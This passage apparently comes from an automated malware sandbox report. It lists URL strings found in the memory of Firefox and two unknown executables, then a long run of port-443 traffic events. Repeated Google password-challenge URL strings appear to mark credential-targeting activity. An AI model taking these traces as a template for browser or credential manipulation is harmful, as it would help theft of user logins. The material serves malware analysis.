Source: firefox.exe, 00000017.00000002.2711239284.000029C74B200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.comK
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2814498844.00000287195E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000017.00000002.2620813706.0000013248ABE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2710270016.0000198D55400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000017.00000002.2711239284.000029C74B200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.tsn.ca
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2814498844.00000287195E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000017.00000002.2711393247.00002CEEA9F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.com
Source: firefox.exe, 00000017.00000002.2662138541.000001324F303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622143175.0000013249236000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2664047201.000001324F491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2710453826.00001BC82E100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2956444225.0000028719AE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3005244049.00000287196D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2979735169.0000028713993000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000017.00000002.2620149903.0000013248926000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2664047201.000001324F491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2692330739.0000013250DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 00000017.00000002.2628867564.000001324B266000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2614640392.000001323D103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2614640392.000001323D16B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2688659391.0000013250417000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2613890423.000001323CDF9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2607534409.0000002974FD8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2614055156.000001323CE70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2674958419.00000132502BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2689955530.0000013250753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2613890423.000001323CDF0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2606186319.000001C2B1C30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2606186319.000001C2B1C3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607423695.000001C2B1D04000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607215401.000002713B3EA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2606330718.000002713B3B4000.00000004.00000020.00020000.00000000.sdmp, 8ed1a1ded0.exe, 0000001C.00000003.2765758203.0000000001967000.00000004.00000020.00020000.00000000.sdmp, 8ed1a1ded0.exe, 0000001C.00000002.2831551823.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, 8ed1a1ded0.exe, 0000001C.00000003.2816405120.0000000001C58000.00000004.00000020.00020000.00000000.sdmp, 8ed1a1ded0.exe, 0000001C.00000002.2828912376.0000000001A70000.00000004.00000020.00020000.00000000.sdmp, 8ed1a1ded0.exe, 00000020.00000003.2811783543.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000015.00000002.2504426275.000002BAA7077000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2514118283.0000014EFDCEF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2613890423.000001323CDF9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000035.00000002.2745198629.000001A56BD7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000017.00000002.2615846850.000001323E9B9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2631147397.000001324C993000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2606186319.000001C2B1C30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607423695.000001C2B1D04000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607215401.000002713B3E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2606330718.000002713B3B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdRestartOnLastWindowC
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdUpdateManager:Update
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdWhether
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdhttps://youtube.com/
Source: firefox.exe, 00000017.00000002.2662138541.000001324F303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd~1O2
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/accountDOM_VK_CLOSE_CURLY_BRACKETEnsureFxAccountsWebChannelMIN_STATUS_ANIMATION_
Source: firefox.exe, 00000017.00000002.2711239284.000029C74B200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comK

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 50319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50183
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50371 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50407
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50409
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50408
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50400
Source: unknown	Network traffic detected: HTTP traffic on port 50348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50411 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50259
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50258
Source: unknown	Network traffic detected: HTTP traffic on port 50353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50257
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50261
Source: unknown	Network traffic detected: HTTP traffic on port 50301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown	Network traffic detected: HTTP traffic on port 50270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown	Network traffic detected: HTTP traffic on port 50318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50264
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50268
Source: unknown	Network traffic detected: HTTP traffic on port 50407 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50272
Source: unknown	Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50342 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50280
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50283
Source: unknown	Network traffic detected: HTTP traffic on port 50412 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 50259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 50276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50285
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50284
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50171
Source: unknown	Network traffic detected: HTTP traffic on port 50302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50330
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50335
Source: unknown	Network traffic detected: HTTP traffic on port 50408 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50348
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50228
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50349
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50342
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50344
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50345
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50363 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown	Network traffic detected: HTTP traffic on port 50317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50353
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50362
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50361
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50363
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50371
Source: unknown	Network traffic detected: HTTP traffic on port 50181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 50229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50410
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50412
Source: unknown	Network traffic detected: HTTP traffic on port 50206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50411
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50410 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50305
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50307
Source: unknown	Network traffic detected: HTTP traffic on port 50310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50301
Source: unknown	Network traffic detected: HTTP traffic on port 50285 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 50304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50315
Source: unknown	Network traffic detected: HTTP traffic on port 50361 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50317
